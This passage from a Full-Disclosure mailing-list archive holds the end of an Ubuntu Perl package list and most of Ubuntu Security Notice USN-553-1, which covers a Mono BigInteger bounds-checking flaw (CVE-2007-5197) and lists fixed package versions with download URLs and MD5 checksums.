    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8.orig.tar.gz
      Size/MD5: 12829188 b8c118d4360846829beb30b02a6b91a7

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-7ubuntu3.1_all.deb
      Size/MD5:  7352108 e5eb23ee5b3aa0cdc9695a16d6806dce
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-7ubuntu3.1_all.deb
      Size/MD5:  2309548 a3e19bb488e5abdd25bb6dbfcfc41f01
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-7ubuntu3.1_all.deb
      Size/MD5:    41112 015a3cd3f858159ca6e8f59d9f24a4ea

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:   636102 f074f93f1d6f20b5b4fd3a87681fcc6d
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:     1058 a08f769b54183fa2e1ad5209df65b4fa
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:   826274 dded240edee784d66b32d15a42e21420
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:  2758908 030cca99de6221176f6f1b30b2730761
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:    33638 0fb9c0f1f5a4ec9be1a8fa5b153f3a31
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:  4054576 ed997ee6c2d500d6edc6cbc0044ce6be

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:   576402 9a43f0153732f1c9da78dd888a679e08
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:   533380 1bb3c67a2d586ef3eaefb41be94ab729
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:   765194 3e7418191776393366a27650158850f8
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:  2522478 f8720540f22cf8cf7f09b3456b327cae
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:    31910 f109f1280eb2d49cd1c1ce6a0ca1f0be
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:  3386812 7d0627fd447f7304f09cf1f97fd9a60d

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:   655908 8938912ff5b287ecf0cc03346c34bbb1
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:     1064 798ce70342c8d3604f23f5752866ea81
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:   854220 c486169333316db7439e1095b1cce637
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:  2724854 bdcd88d30efe2b485b35250c5c3ee797
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:    37026 a83324fe5b2179fd06f06bd68d349f25
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:  3768652 1a31197fa79647a63ea3ae553353a857

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:   596948 2d898e93ec93bec4f77d7d88601fab96
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:     1060 3d3ecf3c4b079230a7232667d86df061
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:   799330 db0cf8569787563788f4b4299f3a24c3
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:  2594250 4d26ef4c14fa16e0cd5b94a75596590d
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:    33122 264999f3199971dc1cf0aca911c3b1ea
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:  3684732 497152ef28c663d150b4d1d564a1b068

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071204/89380541/attachment.bin 

From kees at ubuntu.com  Wed Dec  5 00:08:19 2007
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 4 Dec 2007 16:08:19 -0800
Subject: [Full-disclosure] [USN-553-1] Mono vulnerability
Message-ID: <20071205000819.GD8789@outflux.net>

=========================================================== 
Ubuntu Security Notice USN-553-1          December 04, 2007
mono vulnerability
CVE-2007-5197
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  mono-classlib-1.0               1.1.13.6-0ubuntu3.3
  mono-classlib-2.0               1.1.13.6-0ubuntu3.3

Ubuntu 6.10:
  libmono-corlib1.0-cil           1.1.17.1-1ubuntu7.2
  libmono-corlib2.0-cil           1.1.17.1-1ubuntu7.2
  libmono-security1.0-cil         1.1.17.1-1ubuntu7.2
  libmono-security2.0-cil         1.1.17.1-1ubuntu7.2

Ubuntu 7.04:
  libmono-corlib1.0-cil           1.2.3.1-1ubuntu1.1
  libmono-corlib2.0-cil           1.2.3.1-1ubuntu1.1
  libmono-security1.0-cil         1.2.3.1-1ubuntu1.1
  libmono-security2.0-cil         1.2.3.1-1ubuntu1.1

Ubuntu 7.10:
  libmono-corlib1.0-cil           1.2.4-6ubuntu6.1
  libmono-corlib2.0-cil           1.2.4-6ubuntu6.1
  libmono-security1.0-cil         1.2.4-6ubuntu6.1
  libmono-security2.0-cil         1.2.4-6ubuntu6.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Mono did not correctly bounds check certain BigInteger
actions.  Remote attackers could exploit this to crash a Mono application or
possibly execute arbitrary code with user privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.3.diff.gz
      Size/MD5:    49205 1dd67806aca65f9361028e09dd03374e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.3.dsc
      Size/MD5:     1047 a78873c6a8c209662c0d876b6d879a3e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6.orig.tar.gz
      Size/MD5: 18217583 330cc66c6a44525950daf10c4f17c10e

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-assemblies-base_1.1.13.6-0ubuntu3.3_all.deb
      Size/MD5:    42114 d9468aca47cdaef7bfdc3cce1ab2f2bf
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-classlib-1.0-dbg_1.1.13.6-0ubuntu3.3_all.deb
      Size/MD5:  3794920 6cc59c95508bd9971f33719d37c20f81
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-classlib-1.0_1.1.13.6-0ubuntu3.3_all.deb
      Size/MD5:  4560272 17398de3e2656fb89d09b1f2f8449864
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-classlib-2.0_1.1.13.6-0ubuntu3.3_all.deb
      Size/MD5:  5218626 393b657ce1a38b1a603fe23c65993f64
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gac_1.1.13.6-0ubuntu3.3_all.deb
      Size/MD5:    53358 723395e2e1f222bfda76dc881faef388
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gmcs_1.1.13.6-0ubuntu3.3_all.deb
      Size/MD5:   841202 cea877947f3960d4b28414aed8f17ad2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-mcs_1.1.13.6-0ubuntu3.3_all.deb
      Size/MD5:  1415996 695b57669b478e29e68ec5bb8bdb736f
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/mono-classlib-2.0-dbg_1.1.13.6-0ubuntu3.3_all.deb
      Size/MD5:  4568630 0abb3f2083eb50f89e1f758e2da17aca

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.13.6-0ubuntu3.3_amd64.deb
      Size/MD5:  1127758 68aa6fa0b32092840b1eeba9d530e796
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.13.6-0ubuntu3.3_amd64.deb
      Size/MD5:   866158 930b1cfe55381048bcb8ca0cf277635e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.13.6-0ubuntu3.3_amd64.deb
      Size/MD5:   116086 05bb9c092fc343d2870ac40acd3ff5f1
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.13.6-0ubuntu3.3_amd64.deb
      Size/MD5:    42138 d3a0fdb1fbc5f6e508dd222af772b208
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.13.6-0ubuntu3.3_amd64.deb
      Size/MD5:    57718 6855145c4a21b5966149e8516357f371
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.13.6-0ubuntu3.3_amd64.deb
      Size/MD5:    12924 85c5ed6db4e482004dec0a86f456b891
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.13.6-0ubuntu3.3_amd64.deb
      Size/MD5:  1117728 b057e33056ef185d7c72fc94f4076b73
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.3_amd64.deb
      Size/MD5:     1208 ea00401b7fa2d180d4507a5903472170

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.13.6-0ubuntu3.3_i386.deb
      Size/MD5:  1017424 16e907d0f4ec705f9e531472e902ea7b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.13.6-0ubuntu3.3_i386.deb
      Size/MD5:   780644 82da2e40c22753a239720611c7094592
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.13.6-0ubuntu3.3_i386.deb
      Size/MD5:   115642 ad5db117ef1b99b8ee937e8d4ec5041f
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.13.6-0ubuntu3.3_i386.deb
      Size/MD5:    42138 968053c1fa8d5b5104a20b570854c363
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.13.6-0ubuntu3.3_i386.deb
      Size/MD5:    50780 9e696c5849576ce3a85b618c34cf99f9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.13.6-0ubuntu3.3_i386.deb
      Size/MD5:    12730 0f18bcb2b428d26286d015b60a2fc3c1
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.13.6-0ubuntu3.3_i386.deb
      Size/MD5:  1015064 f73e6b95ae74a07f3c40f441b733e65c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.3_i386.deb
      Size/MD5:     1208 500c384bf6d5d4eed02feaf667a027f2

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.13.6-0ubuntu3.3_powerpc.deb
      Size/MD5:  1085244 9f50d724650b2a00e51a5186e59b10c1
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.13.6-0ubuntu3.3_powerpc.deb
      Size/MD5:   816340 204552b8905f11d0d68aae4cafe6c5cc
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.13.6-0ubuntu3.3_powerpc.deb
      Size/MD5:   116566 56709bac6e14736ba40bd995745aec32
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.13.6-0ubuntu3.3_powerpc.deb
      Size/MD5:    42142 94156ecc65848493f8190978616178c0
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.13.6-0ubuntu3.3_powerpc.deb
      Size/MD5:    56740 dde3a83d8d71856ef698291b25ba337c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.13.6-0ubuntu3.3_powerpc.deb
      Size/MD5:    14786 8d1d24e6f51fa89bf77833643de98804
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.13.6-0ubuntu3.3_powerpc.deb
      Size/MD5:  1103068 c20e394ee7afc1fefc7d87faf36941ec
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.3_powerpc.deb
      Size/MD5:     1212 85908383bd359508935165abf7c42b1c

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.13.6-0ubuntu3.3_sparc.deb
      Size/MD5:  1093166 5c4426b8b9257626a2c062aa27afbd1b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.13.6-0ubuntu3.3_sparc.deb
      Size/MD5:   821034 af19fe8fbea0ad717c22f12999907874
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.13.6-0ubuntu3.3_sparc.deb
      Size/MD5:   116192 7a99a9e1ae39d3252773278c26aff72d
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.13.6-0ubuntu3.3_sparc.deb
      Size/MD5:    42144 592ae4e7234298d2352c050c668fc2f4
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.13.6-0ubuntu3.3_sparc.deb
      Size/MD5:    53732 d4fc061bb08f6fca1ef10a9c146a84ba
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.13.6-0ubuntu3.3_sparc.deb
      Size/MD5:    12994 295d1cc07863114a07d0976ea4da1830
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.13.6-0ubuntu3.3_sparc.deb
      Size/MD5:  1049890 f5a689933567a3d7aa0c1704f4a30e13
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.3_sparc.deb
      Size/MD5:     1208 dfc76b9be008e2b9c80b011e18011180

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.2.diff.gz
      Size/MD5:    41312 761b5ee11516721281e3737689a150d9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.2.dsc
      Size/MD5:     2303 d7723dce32256359d24e4cd19bb55673
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1.orig.tar.gz
      Size/MD5: 19352812 072cb3de1f19cbebd6034f7a5cff1292

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-accessibility1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    19790 15e0f64abeed5625ae9bfed7c1ade144
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-accessibility2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    19722 50f1745598427a9adfbcd2968e128866
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-cairo1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    45368 12f39fd312390e3035820c3ba7ada2e3
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-corlib1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:  1845318 df586b0e7e6f00321154765fdd8b7eda
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-corlib2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:  2087008 5042bd84c67fba984f7f791758eaadf8
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-data-tds1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    64880 4676fc864a6dcd5bba60257ab3edfff8
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-data-tds2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    68588 d466f9b2b1bb7ffe347a8fda8f480d68
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-microsoft-build2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   196336 dc8555b7be3afc3fd9843d3748c37e62
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-peapi1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   101046 0a16e0476ee4c19400cdc6d260c4f0b5
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-peapi2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   101084 6376135038f864934af1ba70539a0076
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-relaxng1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   178624 db250d8d47d56f9bdc3d22b1e835e5b5
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-security1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   247186 000c3ef17b1badea2823b21dec56b2ba
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-security2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   248396 84529a72091d84042e5491dc7106fa69
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip0.6-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   109776 0f14fb2778f18c5af9e3da93a401df57
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip0.84-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   131990 ffd75301c216e462268b375f569e874c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip2.84-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   132042 161561e932f130dda0a84dbf21bd7da9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sqlite1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    43186 5ef81f1010b2eab0336539d527260476
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-data1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   457276 c058bc410de9d9a422404adf22ab4b6e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-data2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   522424 ba59d5cf139b8a79cd8e7aa2ab5b62b6
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-runtime1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   118492 c2a5d7eb01f24c1f247466eb58061605
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-web1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   773202 467e0113e4e389a6857f05764bf6bf5c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-web2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:  1414476 e600053c95554f34bd0582aebc4a40fd
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:  1747350 b9330cb9de197c4e818b80b5cbb9ad6d
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:  2286512 1237907a09b2823584041d6c8ee266df
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-winforms1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:  1364488 b4a86de871cf4842dd9857504265cc18
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-winforms2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:  1563852 e8ec80ba7e8f32d087beb7fe3469cb33
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   403492 044ba9982ece13b53767ff37d2b92ae8
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   403556 1320f62f1d0f53355e75a1c56a5fead9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-classlib-1.0_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    16016 3f29190d92de418e5833bf8f899a9412
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gac_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    29456 13d86792369653fb0dbb492ed4c73ca9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gmcs_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   839556 5e1edcc01afed0139eacd627b15859a6
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-mcs_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:  1012468 f3d80b86c04f92614a9e99f5b9a819f8
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-bytefx0.7.6.1-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    91286 9ebcae49a4e239bca7ab7e324978689c
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-bytefx0.7.6.2-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    91350 020b3ab54f32f58d6965131d154b6f00
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-c5-1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   226914 31b73ea05e611db804a0e5bbf08cb6e1
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-cairo2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    45176 2bc02e4a3386b96cd62f529c66a1d6a7
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-cscompmgd7.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    24138 ee8d322366ac8b89fbf02176e0c56e5f
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-cscompmgd8.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    24374 aa4b68924bc134150c0ccbaeae6d801e
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-firebirdsql1.7-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   295626 de4d6c0e77ea66e4821d359d4cfef7ba
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-ldap1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   221816 8762f42ffd5ec70d97b0105c04e8bcbc
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-ldap2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   221686 05667dbd304d6b7cbc27fa98d83f9676
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-microsoft7.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   272484 5ddd4de655090ade578cd223565e9772
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-microsoft8.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   272532 e4497b1081e51c05c560b30b9b630661
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-npgsql1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   130876 4a4e966de77c374b0d8d609bf97a76bb
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-npgsql2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   131078 714dce4aa31a93e92f6f243e49cd863e
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-oracle1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   113288 2509810992723d61580c354a1e71bcd7
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-oracle2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   112780 a334b79c178256a777dee3511f0effe4
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-relaxng2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   179096 68dac2b4b32c82f731788b8f66ddd0bf
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-sharpzip2.6-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   109852 1aa7647283f490976ec732392e8a9de9
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-sqlite2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    43166 663b55d1cfa5ae6b9771a9d713b1ebfc
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-ldap1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    48154 792f305b10a01e7f362d1bfb2875836d
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-ldap2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    48118 07130f1de310fbd8d42e7e984afce8d3
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-messaging1.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    63584 51155730e58f273b5fa04cb6dd701396
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-messaging2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    63572 f5a5308c9c4b3d82bc07e504421f231a
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-runtime2.0-cil_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:   136064 ce2eea3667131739da8dbe40b16ef383
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/mono-classlib-2.0_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    16000 b51dca28ad7b7e0fb1d5e2b86d758ef7
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/mono-mjs_1.1.17.1-1ubuntu7.2_all.deb
      Size/MD5:    26214 466551f27a61092cb3a4437b02b2d2ef

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.17.1-1ubuntu7.2_amd64.deb
      Size/MD5:  1145768 b93d06ccbd8a1da04df3d21525c2d47e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.17.1-1ubuntu7.2_amd64.deb
      Size/MD5:   871572 deab12828a986cd8f8d93ba48b792c21
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.17.1-1ubuntu7.2_amd64.deb
      Size/MD5:    93530 2dbf62f5504cf62fbb08e0bcdfe05149
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.17.1-1ubuntu7.2_amd64.deb
      Size/MD5:    15976 26dcb8aa0aea4c9e848beafa482e4ba6
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.17.1-1ubuntu7.2_amd64.deb
      Size/MD5:    60070 4ac9955d8f4a17a1897ddb6baf474f18
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.17.1-1ubuntu7.2_amd64.deb
      Size/MD5:   753000 aea22983e9ccd961062fc87de02e7f02
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.1.17.1-1ubuntu7.2_amd64.deb
      Size/MD5:    15948 f9618e3071be58520fbfcefceb1fa2f9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.17.1-1ubuntu7.2_amd64.deb
      Size/MD5:  1165026 39f30ca8d151f75fda0fe87c64601d20
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.2_amd64.deb
      Size/MD5:     1262 ab352de389f8a3d8c7ef795567b928c4

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.17.1-1ubuntu7.2_i386.deb
      Size/MD5:  1076022 38d05b28960cacc5528245ab62af274e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.17.1-1ubuntu7.2_i386.deb
